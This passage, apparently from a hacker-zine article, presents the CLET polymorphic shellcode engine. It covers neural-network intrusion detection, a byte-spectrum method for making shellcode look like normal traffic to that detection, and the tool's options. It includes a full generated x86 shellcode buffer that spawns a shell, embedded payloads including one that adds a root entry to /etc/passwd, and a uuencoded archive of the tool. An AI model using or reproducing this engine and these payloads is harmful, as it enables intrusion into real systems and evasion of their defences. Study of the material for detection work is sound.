+As we explained it before, we want that, from a set of criterions detected
+by some network probes, a manager takes a real time reliable decision on 
+the network trafic. With the development of polymorphic engines, maybe
+pattern matching will become inefficient or too difficult to be
+implemented because you have to create lots of rules, perhaps sometimes
+you don't know. Is there a solution? We have lots of informations and we
+want to treat them quickly to finaly obtain a decision, that's the general
+goal of what are called data mining methods.
+
+In fact, the goal of data mining is the following:
+
+from a big set of explanatory variables (X1,..,XN) we search to take a 
+decision on an unknown variable Y. Notice that:
+
+* this decision has to be taken quickly (problem of calculating 
+  complexity)
+* this decision has to be reliable (problem of positif falses...)
+
+There is a lot of methods which belongs to theory of data mining. To
+make understanding the CLET approach about anti-data mining methods, we
+have decided to show one of them (actually bases of one of them): the 
+connexionist method because this method has several qualities for 
+intrusion detection:
+
+* the recognition of intrusion is based on learning. For example, with an 
+only neuron, the learning consists in choosing the best explanatory
+variables X1,...,XN and setting the best values for the parameters 
+w1,...wN (cf below). 
+* thanks to this learning, a neural network is very flexible and is able
+to work with a big number of variables and with explanation of Y with the
+variables X1,...,XN ().
+
+So, in a network, such an approach seems to be interesting, since the
+number of explanatory variables is certainly huge. Let's explain bases of
+it.
+
+
+------[ 5.2.A - Modelising a neuron.
+
+To understand how can work an IDS using a data-mining method based on
+neural approach, we have to understand how work a neuron (so called 
+because this kind of programs copy neuron of your brain). The scheme 
+below explains how a neuron runs.
+As in your brain, a neuron is a simple calculator.
+
+                      ____________
+X1 --------w1--------|            | 
+                     |            |
+X2---------w2--------|            |
+                     |   Neuron   |--fh[(w1*X1 + w2*X2 + ... + wN*XN)-B]
+...                  |            |
+                     |            |
+XN --------wN--------|____________|
+
+
+fh is the function defined by:    |  
+fh(x)=1 if x>0                    |  B is called the offset of the neuron.
+fh(x)=0 if x<=0                   |
+
+So we understand that the exiting value is 0 or 1 depending of the 
+entering value X1,X2,...,XN and depending on w1,w2,...,wN.
+
+------[ 5.2.B - a data-mining method: using neural approach in an IDS.
+
+Imagine now that the value X1,X2,...,XN are values of the data of a 
+packet: X1 is the first byte, X2 the second,..., XN the last one (you can
+choose X1 the first bit, X2 the second, etc... if you want that the
+entering values are 0 or 1) (we can choose too X1 number of \x00, X2 
+number of \x01,... there are many methods, we expose one idea here in
+order to explain data mining). The question is: which w1,w2,...wN have we 
+to choose in order to generate an exiting value of 1 if the packet is a
+'dangerous' one and 0 if it is a normal one? We can't find value, our 
+neuron have to learn them with the following algorithm:
+
+w1,w2,...,wN is first chosen randomly.
+Then we create some packets and some 'dangerous' packets with polymorphic
+engine, and we test them with the neuron.
+We modify the wI when the exiting value is wrong.
+
+If the exiting value is 0 instead of 1:
+wI <- wI + z*xI           0<=I<=N
+If the exiting value is 1 instead of 0:
+wI <- wI - z*xI           0<=I<=N 
+
+z is a constant value chosen arbitrarily.
+
+In easy stages, neuron will 'learn' to recognize normal packets from
+'dangerous' ones. In a real IDS, one neuron is not sufficient, and the 
+convergence have to be studied. There is however two big advantages of
+neural approach:
+
+* decisions of a neural network depend not directly on rules written by 
+humans, they are based on learning which set "weights" of different 
+entries of neurons according to the minimization of particular statistical
+criterions. So the decisions are more shrewd and more adapted to the local
+network traffic than general rules.
+* when the field of searching is important (huge data bases for pattern 
+matching), data mining approach is quicker because the algorithm has not
+to search in a huge data bases and as not to perform a lot of calculations
+(when the choice of the network topology, of explanatory variables and
+learning are "good"...)
+
+
+----[ 5.3 - Spectrum Analysis in CLET against data mining method.
+
+The main idea of the method we expose upper, like lots of data mining
+methods, is to learn to recognize a normal packet from a 'dangerous' 
+packet. So we understand that to struggle this kind of methods, simple 
+polymorphism can be not enough, and alphanumeric method (enjoy the 
+excellent article of rix), can be inefficient. Indeed, in a case of a 
+non-alphanumeric communication, alphanumeric data will be considered as
+strange and will create an alert. The question is to know how a polymorph
+engine can generate a polymorphic shellcode which will be considered as
+normal by an IDS using data mining methods. Maybe CLET engine shows a
+beginning of answer. Howerer we are aware of some  weaknesses (for 
+nstance the SpectrumFile has no influence under the fakenot zone), we work
+today on this weaknesses.
+Let's see how it works.
+
+Imagine the following case:
+
+                              _________  
+                             | Firewall|       ________
+               ---Internet---|    +    |------| Server |
+                             |   IDS   |      |________|
+                             |_________| 
+
+
+We can suppose that the IDS analyses the entering packet with a port 
+destination 80 and the ip of the server with data mining methods. 
+To escape this control, our idea is to generate bytes which values are 
+dependant on the probability of this values in a normal trafic:
+
+theo@warmach# sniff eth0 80 2>fingerprint &
+theo@warmach$ lynx server.com
+
+The program sniff will listen on interface eth0 the leaving packet with a
+destination port 80 and record the data of them in a file fingerprint in
+binary.
+Then, we begin to navigate normally to record a 'normal' trafic.
+
+theo@warmach$ stat fingerprint Spectralfile
+
+The program stat will generate a file Spectralfile which content have the
+following format:
+
+0 (number of bytes \x00 in leaving data destinated to server)
+1 (number of bytes \x01 in leaving data destinated to server)
+...
+FF (number of bytes \xFF in leaving data destinated to server)
+
+This Spectralfile can be generated by lots of methods. Instead of my
+example, you can decide to generate it from the trafic on a network, 
+you can decide to write it if you have specials demands....
+
+Now the question is, how can we use this file? how can we use a 
+description of a trafic? Option f of clet allows us to use a analysis of
+a trafic, thanks to this spectral file. 
+
+theo@warmach$ clet -n 100 -c -b 100 -f Spectralfile -B
+(cf 6 for options)
+
+Action of option -f is different between the different zones (NOPzone,
+decipher routine, shellcode, cramming zone). Indeed we want to modify,
+thanks to SpectralFile, process of generation of polymorphic shellcode but
+we can't have the same action upon the different zones because we have
+constraints depending on zones. It's for instance, in some cases, very 
+difficult to generate a fake nop zone according to a spectrum analysis. 
+
+Let see how we can act upon this different zones.
+
+
+------[ 5.3.1 - Generate cramming bytes zone using spectrum analysis.
+
+The simplest idea is to generate a craming bytes zone which spectrum is 
+the same than trafic spectrum:
+
+-------------------------------------------------------------------------
+| FAKENOP | DecipherRoutine | shellcode | bytes to cram | return adress |
+-------------------------------------------------------------------------
+                                                ^
+                                                |
+                                                |
+                                 the probability of these bytes
+                               are dependant on the Spectralfile
+                                     (without the value \x00)
+
+If there is no file in argument, there is equiprobability for all the 
+values (without zero)...
+This process of generation is used if you don't use -B option.
+
+However cramming bytes zone is the gold zone. In that way, we can generate
+bytes we want. Remember that in some zones, we don't use spectrum 
+analysis (like in DecipherRoutine in our version). It will more usefull to
+use cramming bytes zone in order to add bytes we lack in previous zones in 
+which we can't so easily use spectral file. Let's go!
+
+
+--------[ 5.3.1.A - A difficult problem
+
+To explain it, we will take a simple example. We are interested in a zone 
+where there are only three bytes accepted called A,B,C. A spectrum study
+of these zone shows us:
+
+  A: 50
+  B: 50
+  C: 100
+
+The problem is that, because of our shellcode and our nop_zone, we have
+the following fixed beginning of our packet: 
+
+ABBAAAAA (8 bytes)
+
+We can add two bytes with our cramming zone. The question is:
+which 2 bytes have we to choose?
+
+The answer is relativy simple, intuitively we think of CC, why?
+because C is important in trafic and we don't have it. In fact, if we 
+call
+Xa the random variable of Bernouilli associated to the number of A in the
+   first 9 bytes
+Xb the random variable of Bernouilli associated to the number of B in the
+   first 9 bytes 
+Xc the random variable of Bernouilli associated to the number of C in the
+   first 9 bytes
+
+we intuitively compare p(Xa=6)*p(Xb=2)*p(Xc=1) > p(Xa=7)*p(Xb=2)
+                   and p(Xa=6)*p(Xb=2)*p(Xc=1) > p(Xa=6)*p(Xb=3)
+   
+
+Thus, we choose C because the packet ABBAAAAAC have, spectrumly speaking, 
+more probablities to exist than ABBAAAAAA or ABBAAAAAB.
+
+Maybe you can think that it is because C has the most important
+probability in the trafic. It's a wrong way of thinking. Indeed, imagine
+we have the following beginning:
+
+CCCCCBBB
+
+how have to choose the next byte? we will choose A although A and B have
+the same probability to come because of the reason explained upper.
+
+Ok so we choose C. Using the same principles, we then choose C for the
+tenth bytes: ABBAAAAACC.
+
+The problem is that we can't use this method to generate the cramming 
+bytes. Indeed, this method is fixed. When we write fixed, we want to say 
+that the first 8 bytes fixed the two following. That is a weakness!
+In that way, if we generate the cramming bytes zone by this method, that 
+means that the beginning zone (nop_zone+ decipher + shellcode) will fix 
+the cramming zone. If we use a principle, we create a method to recognize
+our packet. Take the beginning and try with the same principles to create
+a cramming zone. If you obtain the same bytes then the packet have been
+created by CLET polymorphism engine (even if it is not easy to find the 
+beginning of the cramming bytes zone). You can discard it.
+
+So now we have to introduce a law of probability. Indeed, if we have the
+following beginning: ABBAAAAA, we have to increase the probability to 
+obtain a C and decrease probability to obtain B or A. But this last 
+probabilities mustn't be null! The real question is thus:
+how modifying probability of A,B,C in order to finally obtain a packet 
+which spectrum is close to trafic spectrum?
+
+------[ 5.3.1.B - A logical idea.
+
+Take the last example: we have 
+
+ABBAAAAA
+
+and a spectrum file with:
+A=50; B=50; C=100;
+
+how choosing laws of probabilty?
+With notations used upper and in case of all the bytes would have been
+chosen using spectrum file, we would have:
+
+E[Xa]=9/4
+E[Xb]=9/4
+E[Xc]=9/2
+
+E[X] is written for the hope of the random variable X (mathematicaly 
+speaking in our case: E[X]=p(X)*size (here 9) because it's a Bernouilli
+variable).
+
+In fact we have 6 A and 2 B. 
+Because 9/4-6 <0, it will stupid to generate a A, we can write that the
+new probability of A is now p(A)=0!
+
+However 9/4-2 >0 and 9/2-0>0 so we can still generate B and C to ajust the
+spectrum. We must have p(B)>0 and p(C)>0.
+We have:
+
+9/4-2=1/4
+9/2-0=9/2
+
+So intuitively, we can think that it is logic that C has a probablity 
+(9/2)/(1/4)=18 bigger than probability of B. Thus we have to solve the 
+system:
+
+ | p(C)=18*p(B)      ie    | p(B)=1/19
+ | p(C)+p(B)=1             | p(C)=18/19
+
+and we obtain laws for generate the ninth byte.
+Then we can use the same algorithm to create cramming byte zone.
+
+However this algorithm has the following problem:
+
+the big problem is to know in what conditions we have:
+
+                      E[Xa] ~ sizeof(packet) * p(A) 
+                      E[Xb] ~ sizeof(packet) * p(B)
+                      E[Xc] ~ sizeof(packet) * p(C)
+                      ...
+                    when sizeof(cramming zone) ---> +oo
+                    ie when sizeof(paquet) -------> +oo
+
+~ means equivalent to (in the mathematical sense).
+
+sizeof(packet) * p(.) would be the hope in case of the whole packet would
+have been generated depending on trafic (because in such a case, Xa,Xb,..
+would be variables of Bernouilli, see [7]). Remember it's what we want. We
+want that our cramming byte zone generate a packet which entire spectrum
+is close to trafic spectrum. We want that our laws 'correct' the spectrum
+of the beginning. Intuitively we can hope that it will be the case because
+we favour lacking bytes over the others. However, it is a bit difficult to
+prove it, mathematicaly speaking. Indeed take E[Xa] for instance. It's 
+very difficult to write it. In that way laws to generate the N byte 
+depending on the N-1 random byte. In our example, laws to generate the 
+tenth byte are not the same if we have ABBAAAAAC or ABBAAAAAB. Remember
+that to avoid a fixed method the two cases are allowed!
+That's for all this reasons we have chosen a simpler method.
+
+------[ 5.3.1.C - CLET Method.
+
+If you don't use the option -B, cramming bytes zone will be generated as
+explain in the beginning of 5.3.1, without taking the beginning into 
+account. We can begin to explain how this method is implemented, how it 
+uses the spectrum file. Imagine we have the following spectrum file:
+
+  0 6
+  1 18
+  2 13
+  3 32
+  4 0
+  .....
+  FC 0
+  FD 37
+  FE 0
+  FF 0
+
+First we can notice that we don't take care of the first line because we
+can't generate zeros in our zone. We build the following board:
+
+   |  sizeof(board) |   1   |   2   |   3   |   FC   |
+---------------------------------------------------------------
+   |   XXXXXXXXX    |  18   | 13+18 | 31+32 |  63+37 |
+                              = 31    = 63    = 100
+
+
+Then we randomly choose a number n between 1 and 100 and we make a 
+dichotomic search in the board (to limit the complexity because we have a
+sorted board).
+
+if 0  < n <= 18 we generate \x01
+if 18 < n <= 31 we generate \x02
+if 31 < n <= 63 we generate \x03
+if 63 < n <= 100 we generate \xFC
+
+This method allows us to generate a cramming bytes zone with p(1)=18/100,
+p(2)=13/100, p(3)=32/100 and p(FC)=37/100, without using float division.
+
+Now let's see how the option -B take the beginning into account.
+
+We take the same example with the same spectrum file:
+
+   |  sizeof(board) |   1   |   2   |   3   |   FC   |
+---------------------------------------------------------------
+   |   XXXXXXXXX    |  18   | 13+18 | 31+32 |  63+37 |
+                              = 31    = 63    = 100
+
+To take the beginning into account, we modify the board with the following
+method:
+
+Imagine we have to generate a 800 bytes cramming bytes zone, the beginning
+have a size of 200 bytes. In fact, at the end, our packet without the 
+adress zone will have a size of 1000 bytes.
+
+We call Ntotal the max value in board (here 100) and b the size of the
+packet without the adress zone (here 1000).
+b= b1 + b2 (b1 is size of the beginning=fakenop+decipher+shellcode and b2
+is size of cramming byte zone). Here b1=200 and b2=800. 
+
+Let's see how we modify the board, for instance with byte \x03. We call q3
+the number of byte \x03 we found in the beginning. (here we choose q3=20).
+
+We make q3*Ntotal/b=20*1/10=2 and then we make 63-2=61. We obtain the
+following board:
+
+   |  sizeof(board) |   1   |   2   |   3   |   FC   |
+---------------------------------------------------------------
+   |   XXXXXXXXX    |  18   | 13+18 | 63-02 |  61+37 |
+                              = 31    = 61    = 98
+
+So now, we can think that we have a probability of 30/98 to generate \x03,
+however this algorithm have to be use to modify all value. The value 98 
+will be thus modified. We apply the same algorithm and we can suppose we
+finally obtain the board:
+
+   |  sizeof(board) |   1   |   2   |   3   |   FC   |
+---------------------------------------------------------------
+   |   XXXXXXXXX    |  16   | 11+16 |  57   |  57+33 |
+                              = 27             = 90
+
+Finally we see that we obtain laws:
+
+p(\x01)= 16/90
+p(\x02)= 11/90
+p(\x03)= 30/90
+p(\xFC)= 33/90
+
+This laws will be use to generate all the cramming bytes zone.
+Intuitively, we understand that, with this method, we correct our
+spectrum depending on the values we have in the beginning. The question is
+now, can we prove that this method do a right correction, that:
+
+                 E[Xn] ~ b*p(n) when b ---> +oo
+
+where X is a random variable of bernouilli which count the number of the 
+byte n in the packet and p(n) the probability of n to appear in the 
+trafic. 
+
+If such is the case, that means that E[X], with a sufficient value of b,
+is 'like a simple bernoulli hope'. It's like we have generated the whole
+packet with probabilities of the trafic!
+
+Let's prove it!
+
+We take the same notation. Ntotal is total sum of data in the trafic. 
+b=b1+b2 (b1 size of beginning, b2 size of cramming zone).
+We call q(\xA2) number of \xA2 bytes in beginning (fakenop +decipher +
+shellcode) and n(\xAE) the number initially written in spectrum file near
+AE.
+
+We take a byte that we call TT.
+
+E[Xt] = q(TT) + b2 * p'(TT)
+
+p'(TT) is the probability for having n after modification of the board. As 
+we see previously:
+
+                            n(TT) - q(TT)*Ntotal/b         
+p'(TT)=  -----------------------------------------------------------
+          Ntotal - ( q(\x00)+ q(\x01) +  ...... + q(\xFF) )*Ntotal/b
+
+So we have:
+
+                                 n(TT) - q(TT)*Ntotal/b
+E[Xt]=q(TT)+b2*--------------------------------------------------------
+               Ntotal - (q(\x00)+ q(\x01) +  ...... + q(\xFF))*Ntotal/b
+
+
+We simplify by Ntotal:
+
+                           (b2*n(TT))/Ntotal - q(TT)*b2/b
+E[Xt]=q(TT) + --------------------------------------------------------
+                     1 - (q(\x00)+ q(\x01) +  ...... + q(\xFF))/b
+
+Ok, when b -----> +oo, we have:
+
+b2~b (b=b1+b2 and b1 is a constant)
+
+Obviously q(\x00)=o(b); q(\x01)=o(b);.....
+
+thus (q(\x00)+ q(\x01) +  ...... + q(\xFF))/b = o(1) and:
+ 1 - (q(\x00)+ q(\x01) +  ...... + q(\xFF))/b -------> 1
+
+so E[Xt] = q(TT) + b*(n(TT)/Ntotal) - q(TT) + o(b)
+
+Moreover we have p(n)=n(TT)/Ntotal so
+
+  E[Xt] = b*p(n) + o(b)
+
+so E[Xt] ~ b*p(n) we got it!
+
+We can notice that we got this relation with the first simple method. We
+can so think that this second method is not better. It is wrong because 
+remember that this relation doesn't show that a method is good or not, it
+just shows if a method is fair or not! This second method takes beginning
+into account, so it is better that the simple one. However before 
+demonstration we can't know if this method was fair. We just knew that if
+it was fair, it will better than the simple one. Now we know that it is 
+fair. That's why CLET uses it.
+
+
+------[ 5.3.2 - Generating shellcode zone using spectrum analysis. 
+
+There is a very simple idea: generating several decipher routines and
+using the best one. But how choose the best one? 
+
+Remember we want to generate a shellcode which will be considered as 
+normal. So we could think that the best decipher routine is the one which
+allows to generate a shellcode which spectrum is close to trafic spectrum.
+However it's important to understand that this kind of approach has its 
+limits. Indeed, imagine following cases:
+
+We have an IDS which data mining methods is very simple, if it finds a 
+byte \xFF in a packet, it generate an alert and discard it. We have the
+following spectrum file:
+
+  0 0
+  1 0
+  .....
+  41 15678
+  42 23445
+  ....
+
+The shellcode we generate will have many \x41 and \x42, but imagine it
+has a \xFF in the ciphered shellcode. Our packet will be discarded. 
+However if we have done a packet without spectrum file and without a \xFF
+byte, this packet would have been accepted. We think that the more the 
+shellcode will have a spectrum close to trafic spectrum, the more the 
+packet have probability to be accepted. However, it can exist exception as
+we see in the example (we can notice that in example the rule was very 
+clear, but rules generated by data mining method are less simple). 
+The main question is thus: how defining a good polymorph shellcode?
+
+Against data mining method there is a simple idea, we have to define a 
+measure which let us to measure a value of a shellcode. How finding this
+measure? For the moment we work on a measure which favours shellcode which
+spectrum is close to trafic spectrum by giving a heavy value of bytes 
+which don't appear in trafic. However, this method is not implemented in
+version 1.0.0 because today IDS with data-mining methods are not very 
+developped (there is SNORT) and so it is difficult to see what kind of 
+caracteristics will be detected (size of packet, spectrum of packet, ...)
+and it is so difficult to define a good measure.
+
+
+------[ 5.3.3 - Generating fakenop zone using spectrum analysis.
+
+In this part, we don't perform to modify the code following the spectrum 
+analysis due to difficulties of such an implementation. We just are 
+trying to generate random code with the my_random function which gives a 
+uniform probability to generate number between min and max... :(
+We still could think about a function which would give a weight for each
+instruction following the results of a spectrum analysis, and we could
+generate fake-nop with a random function whose density function corresponds
+to the density of probability given by the former function... 
+The problem with this method is that the set of instructions is smaller 
+than the set of all the hexa codes that contains the network traffic.
+Such a finding automaticaly dodges the issues of our method, and all we
+can do is to minimalise the difference of spectrum between our code and
+a normal network traffic and try to compensate with other parts of the 
+shellcode we better control (like the craming bytes)...
+ 
+
+
+----[ 5.4 - Conclusion about anti data-mining methods.
+
+Spectrum Analysis an approach, it's not the only one. We are aware too
+that, with methods like neural method exposed upper, it is possible to
+generate a filter against CLET polymorphic shellcodes, if you use our
+engine as a benchmark to involve your neural system. That's a interessant
+way of using! Maybe it is interessant too to think about genetic methods
+in order to find the best approach (cf [5]). However, today data-mining
+begins and so it's difficult to find the best approach... 
+
+
+--[ 6 - The CLET Polymorphic Shellcode Engine
+
+----[ 6.1 - Principles
+
+We decided to make a different routine at each time, randomly. We first
+generate a XOR (with a random key) at a random place, and then we generate
+reversible instructions (as many as you want) : ADD/SUB, ROL/ROR. We don't
+generate it in assembly but in a pseudo-assembly language, it is easier to
+manipulate pseudo-assembly language at this point of the program because we
+have to make two things at the same time : cipher the shellcode and generate
+the decipher routine.
+
+Let's see how it works :
+
+                        |
+                        |
+                        |
+                +-------+--------+
+                | pseudo-code of |
+                |  the decipher  |<----------------+
+                |    routine     |                 |
+                +----------------+                 |
+                 |              |                  |
+                 |              |                  |
+            traduction    interpretation           |
+                 |              +                  |
+                 |            cipher               |
+                 |              |                  |
+                 |              |                  |
+                 |              |                 YES
+                 |              |                  |
+          +-------------+  +-----------+      +----+----+
+          |   decipher  |  | ciphered  |      |         |
+          |   routine   |  | shellcode +----->| zeroes? |
+          |             |  |           |      |         |
+          +------+------+  +-----------+      +----+----+
+                 |                                 |
+                 |                                NO
+                 |                                 |
+                 |    +----------------------------+
+                 |    |
+                 |    |
+             +-------------+
+             | polymorphed |
+             |  shellcode  |
+             +-------------+
+
+
+
+Of course, when a cipher routine has been generated, we test it to see if a
+zero appear in the ciphered code (we also take care of not having zeroes in
+the keys. If it is the case, we replace it by a 0x01). If it is the case, a
+new cipher routine is generated. If it is good, we generate the decipher
+routine. We don't insert fake instructions among the true instructions of
+the decipher routine, it could improve the generator.
+
+The main frame of our routine is rather the same (this is maybe a weakness)
+but we use three registers. But we take care of using different registers
+at each time, ie those three registers are chosen at random (cf 4.2)
+
+
+----[ 6.2 - Using CLET polymorphic engine
+
+theo@warmach$ ./clet -h
+_________________________________________________________________________
+                                                                        
+ The CLET shellcode mutation engine 
+  by CLET TEAM:
+     Theo Detristan, Tyll Ulenspiegel,
+     Mynheer Superbus Von Underduk, Yann Malcom
+_________________________________________________________________________
+
+
+   Don't use it to enter systems, use it to understand systems.
+
+   Version 1.0.0
+ 
+   Syntax : 
+      ./clet
+        -n nnop : generate nnop NOP. 
+        -a      : use american english dictonnary to generate NOP. 
+        -c      : print C form of the buffer.
+        -i nint : decryption routine has nint instructions (default is 5) 
+        -f file : spectrum file used to polymorph.
+        -b ncra : generate ncra cramming bytes using spectrum or not
+        -B      : cramming bytes zone is adapted to beginning
+        -t      : number of bytes generated is a multiple of 4
+        -x XXXX : XXXX is the address for the address zone
+                  FE011EC9 for instance
+        -z nadd : generate address zone of nadd*4 bytes
+        -e      : execute shellcode. 
+        -d      : dump shellcode to stdout.
+        -s      : spectrum analysis.
+        -S file : load shellcode from file.
+        -E [1-3]: load an embeded shellcode.
+        -h      : display this message.
+
+/* Size options:
+
+In bytes:
+
+  -n nnop                                  -b ncra          -z nadd/4
+ <-------->                              <--------------><------------->
+-------------------------------------------------------------------------
+| FAKENOP | DecipherRoutine | shellcode | bytes to cram | return adress |
+-------------------------------------------------------------------------
+
+ -t allows that: 
+
+    Size_of_fake_nop_zone + Size_decipher + Size_decipher + Size_cramming
+    is a multiple of 4. This option allows to alignate return adresses.
+
+ -i is the number of fake instructions (cf 6.1) in the decipher routine.
+ 
+/* Anti-data mining options:
+
+ -f you give here a spectrum file which shows trafic spectrum (cf 5.3) 
+    If you don't give a file, probabilities of bytes are the same.
+
+ -B the option -b generates a cramming bytes zone. If the option is used
+    without -B, process of generation doesn't take care of the fakenop
+    zone, ciphered shellcode, etc... Indeed if -b is used with -B then
+    cramming bytes zone tries to correct spectrum 'errors' due to the
+    begininning.
+ 
+/* Shellcode
+
+ -E allows you to choose one of our shellcode.
+      1 is a classic bash (packetstorm).
+      2 is aleph one shellcode.
+      3 is a w00w00 code which add a root line in /etc/passwd
+      (don't use it with -e in root)
+
+ -S allows us to give your shellcode. It's important because our
+    shellcodes are not remote shellcode! You give a file and its bytes
+    will be the shellcode. If you just have a shellcode in Cformat you can
+    use convert.
+    
+ -e execute the encrypted shellcode, you see your polymorphic shellcode
+    runs.
+
+/* See the generated shellcode.
+
+ -c writes the shellcode in C format.
+
+ -d dump it on stderr.
+
+
+/* Example
+
+theo@warmach$ ./clet -e -E 2 -b 50 -t -B -c -f ../spectrum/stat2 -a -n 123
+ -a -x AABBCCEE -z 15 -i 8
+
+[+] Generating decryption loop : 
+   ADD 4EC0CB5C
+   ROR 19
+   SUB 466D336C           // option -i
+   XOR A535C6B4           // we've got 8 instructions.
+   ROR D
+   ROR 6
+   SUB 51289E19
+   SUB DAD72129
+done
+
+[+] Generating 123 bytes of  Alpha NOP : 
+NOP : SUPREMELYCRUTCHESCATARACTINSTRUMENTATIONLOVABLYPERILLABARB
+SPANISHIZESBEGANAMBIDEXTROUSLYPHOSPHORSAVEDZEALOUSCONVINCEDFIXERS 
+done
+
+// 123 bytes, it's the -n 123 option. -a means alphanumeric nops.
+
+[+] Choosing used regs : 
+   work_reg : %edx
+   left_reg : %ebx  // regs randomly chosen for decipher routine.
+   addr_reg : %ecx
+done
+
+[+] Generating decryption header : 
+done
+
+[+] Crypting shellcode : 
+done
+
+[+] Generating 50 cramming bytes   // -b 50 bytes of cramming bytes
+[+] Using ../spectrum/stat2        // -f ../spectrum/stat2: bytes
+[+] Adapting to beginning          // depends on spectrum file.
+done                               // -B options: Adapting to beginning
+                                   // cf 5.3.1
+
+[+] Generating 1 adding cramming bytes to equalize // -t option
+[+] Using ../spectrum/stat2        // we can now add adresses of 4 bytes 
+done
+
+[+] Assembling buffer : 
+   buffer length : 348
+done
+
+// This all the polymorph shellcode in C format (option -c) 
+
+Assembled version :
+\x53\x55\x50\x52
+\x45\x4D\x45\x4C
+\x59\x43\x52\x55
+\x54\x43\x48\x45
+\x53\x43\x41\x54
+\x41\x52\x41\x43
+\x54\x49\x4E\x53
+\x54\x52\x55\x4D
+\x45\x4E\x54\x41
+\x54\x49\x4F\x4E
+\x4C\x4F\x56\x41
+\x42\x4C\x59\x50
+\x45\x52\x49\x4C
+\x4C\x41\x42\x41
+\x52\x42\x53\x50
+\x41\x4E\x49\x53
+\x48\x49\x5A\x45
+\x53\x42\x45\x47
+\x41\x4E\x41\x4D
+\x42\x49\x44\x45
+\x58\x54\x52\x4F
+\x55\x53\x4C\x59
+\x50\x48\x4F\x53
+\x50\x48\x4F\x52
+\x53\x41\x56\x45
+\x44\x5A\x45\x41
+\x4C\x4F\x55\x53
+\x43\x4F\x4E\x56
+\x49\x4E\x43\x45
+\x44\x46\x49\x58
+\x45\x52\x53\xEB
+\x3B\x59\x31\xDB
+\xB3\x30\x8B\x11
+\x81\xC2\x5C\xCB
+\xC0\x4E\xC1\xCA
+\x19\x81\xEA\x6C
+\x33\x6D\x46\x81
+\xF2\xB4\xC6\x35
+\xA5\xC1\xCA\x0D
+\xC1\xCA\x06\x81
+\xEA\x19\x9E\x28
+\x51\x81\xEA\x29
+\x21\xD7\xDA\x89
+\x11\x41\x41\x41
+\x41\x80\xEB\x04
+\x74\x07\xEB\xCA
+\xE8\xC0\xFF\xFF
+\xFF\xE3\xBF\x84
+\x3E\x59\xF4\xFD
+\xEE\xE7\xCF\xE2
+\xA2\x02\xF8\xBE
+\x1D\x30\xEB\x32
+\x3C\x12\xD7\x5A
+\x95\x09\xAB\x16
+\x07\x24\xE3\x02
+\xEA\x3B\x58\x02
+\x2D\x7A\x82\x8A
+\x1C\x8A\xE1\x5C
+\x23\x4F\xCF\x7C
+\xF5\x41\x41\x43
+\x42\x43\x0A\x43
+\x43\x43\x41\x41
+\x42\x43\x43\x43
+\x43\x43\x43\x42
+\x43\x43\x43\x43
+\x43\x0D\x0D\x43
+\x43\x43\x43\x43
+\x41\x42\x43\x43
+\x43\x41\x43\x42
+\x42\x43\x43\x42
+\x0D\x41\x43\x41
+\x42\x41\x43\x43  // -t option: it is equalized.
+\xAA\xBB\xCC\xEE  // -z 15 option: 15*sizeof(adress) zone
+\xAA\xBB\xCC\xEE  // -x AABBCCEE option gives the adress
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+\xAA\xBB\xCC\xEE
+
+Executing buffer : ... // -e option we test our polymorph shellcode
+sh-2.05a$              // -E 2 we've chosen Aleph One shellcode
+                       // That's it.
+
+--[ 7 - References
+
+[1] http://www.phrack.org/p49-14
+    Smashing The Stack For Fun And Profit, Aleph One
+
+[2] http://www.phrack.org/p57-0x0f
+    Writing ia32 alphanumeric shellcodes, rix
+
+[3] IA-32 Intel Architecture Software Developer's Manual
+    Volume 2: Instruction Set Reference
+    http://www.intel.com/design/pentium4/manuals/
+    get it free ! http://www.intel.com/design/pentium4/manuals/index2.htm
+
+[4] Billy Belcebu Virus Writing Guide
+    especially the chapter on polymorphism
+    http://vx.netlux.org/lib/static/vdat/tumisc60.htm
+
+[5] Du virus a l'antivirus, Mark Ludwig
+    especially the chapter on polymorphism
+
+[6] Neural Computing: an introduction.
+    R. Beale, T. Jackson
+
+[7] Calcul des probabilites
+    Dominique Foata, Aime Fuchs
+    Dunod edition
+
+--[ Greetz
+
+We would like to thank :
+- all those who were at the RtC.Party'03, in particular ptah, eldre8, kad 
+  and spacewalker.
+- #kaori@irc.freenode.net guys                 
+- basque && bedian for moral support
+
+begin 644 clet
+M'XL(`'9N.3\``^S];8\T.7:F">IS_HH'LVC,#+#=G2G5RPK"?C!W8[A;AKF9
+M)TGS"(_=@5!=E:VN6:FJD%75V\)@_OORW/=]#AE9DKH7HU%CL7HR@^<B>?AJ
+M=!J-1B-_^;??_^'?_>=O_MW7_^[K?_O[7__JW__9_PG_OO[Z)U___*<_;?+K
+M;W[^TZ]'Z?_^[.N?__R;GWS]]<]_]O4W?_;U-W_^S=<__;,O/_T_(S,__O?'
+MW__A%S]\^?)G?_?;O_G]/Z7W7_/__]%_O_S1]?]/O_KAG[T-X/I__?5_P_7_
+MYB]^_LW/[?K_[*?_>OW_1?[]0]?_;[[_S5__ZOM?_O#WO_O#O_M/_PQI?/W-
+MUU__[)^X_M_\Q3=Q_7_V<_O]__0O_OS/_^S+U_\,:?]7__W_^?7_XV]^_^N_
+M^<WWO_KRZ]_\X<O?_?U?__"+W_SJMW_WY7\*][_][6_^QCS_KU_^Q.E__JNO
+M_B^_^OX__OHWWW^Y3>]__;IL\_[RU\M6ZI>??O7?NV#_^N^_Z=\_]/O_P]__
+M[OO?_[/\\OGOO_;[__E/?C[<_YO[-S_YYN=_\:^__W^)?_X#?M_SE__Q__E?
+MOO[Z?_P2/^IIGN'VS>!6CA/<_GQPRPK[%Y_<5KC]I+EUQW3YZS0O7W[^Y;-3
+M6;[\[$=.I_N7G_Y8Z_[E)S_6>O_R%S]RFM^__/F/G,[O7[[YD=/T_N7K(6/6
+M?2U;_?*3/__+G_SESW[^YW_YLR__]LLW7WUEOX2F\N7W?_CAC[_\PY>O_K>O
+MOO1N\)?_J36<7_^&?G\U^EA?^HL?_N:OOOK?O_SNKTWCRU]]^9-___[?>[3_
+M\;<_?/G=[[__XZ]^&]']^K>_Z:G_\3?-^J/$+8G_W(R_^I,<_6<S_Q\__5\L
+M]:9@MK_ZQWOC?^CWS[S\]2]_^ZOO_R7N_S_YZ3<_^]'O_Z=_T9S^]??_+_#/
